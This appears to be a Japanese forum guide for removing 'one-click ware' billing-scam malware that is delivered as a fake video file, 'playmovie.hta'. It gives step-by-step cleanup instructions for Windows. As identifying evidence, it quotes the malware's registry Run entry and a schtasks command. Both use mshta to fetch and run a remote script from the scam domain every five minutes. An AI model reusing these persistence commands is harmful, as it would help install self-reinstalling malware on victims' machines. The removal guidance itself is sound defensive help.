|
|
h ttp://www.galcco.com/
警告:
このURLにアクセスし動画ファイルと見せ掛けたhtaファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。
ダウンロードファイル名「playmovie.hta」
O4 - HKCU\..\Run: [system_boot_f15de75b22cd0381eceb2d65e01e49ec] C:\Windows\system32\mshta h ttp://www.galcco.com/reg2.php?cid=f15de75b22cd0381eceb2d65e01e49ec
WshShell.Run "schtasks.exe /create /tn/tr ""mshta h ttp://www.galcco.com/reg2.php?cid="" /sc minute /mo 5 /F"
管理者権限で実行する事。
隠しファイル・システムファイル・拡張子を表示する設定にします。
0. スタートボタンをクリックします。
1. コントロールパネル→フォルダオプションを選択する。
http://bbsee.info/_bbs/nekoou/upload/be83ab3ecd0db773eb2dc1b0a17836a1.jpg
Windows7の場合のフォルダーオプション設定
http://bbsee.info/_bbs/nekoou/upload/55a7cf9c71f1c9c495413f934dd1a158.png
2. フォルダオプションの窓が開いたら、表示のタブをクリック。
3. ファイルとフォルダの表示から 全てのファイルフォルダを表示するのボタンをクリック
http://bbsee.info/_bbs/nekoou/upload/e165421110ba03099a1c0393373c5b43.jpg
4. [登録されているファイルの拡張子は表示しない] からチェックを外します。
5. [保護されたオペレーティング システム ファイルを表示しない] からチェックを外します。
http://bbsee.info/_bbs/nekoou/upload/289dff07669d7a23de0ef88d2f7129e7.jpg
(この時、警告ダイアログが開きますが、[はい] と答えてください。)
以降はこの設定を保つようにしてください。
先ず、タスクスケジューラ確認してください。
アダルトシティーのタスクスケジューラの画像です
http://bbsee.info/_bbs/nekoou/upload/1595af6435015c77a7149e92a551338e.jpg
ギャルっこムービーの場合は、詳細の部分の記載が
mshta h ttp://www.galcco.com/reg2.php?
になります。
タスクスケジューラライブラリの記述
http://bbsee.info/_bbs/nekoou/upload/08d98638c6fcd194a4b1e6992063e944.jpg
ここも mshta h ttp://www.galcco.com/reg2.php? になります。
該当タスクを選択した状態で、操作から×削除をクリックします。
これで5分ごとに立ち上がっていた忌々しい貼り付きは停止します。
次にプロセスの終了。
1. タスクバーの何も無い所で、右クリックします。
2. タスクマネージャが起動したら、プロセスのタブをクリック。
3. そこで「mshta.exe」という記述を見つけて選択して右クリックでプロセスの終了。
http://bbsee.info/_bbs/nekoou/upload/ffd52f3c7e12435a724a8f30fddadd9c.jpg
検索機能を利用して、悪意のあるファイルを削除します。
1. スタートボタンをクリックして「検索の開始」に『playmovie.hta』と入力して「すべての場所の検索」をクリックして「高度な検索」を選択。
2. 次の表示画面上に「インデックスのないファイル、隠しファイルおよびシステムファイルを含める」にチェックマークを入れ「検索」をクリックする。
3. 検索されたもの全てを右クリックで削除する。
検索されない場合もあります。
検索されなかった場合は、気にしなくて大丈夫です。
最後に再起動をします。
再起動後に貼り付かなければ成功です。
|
|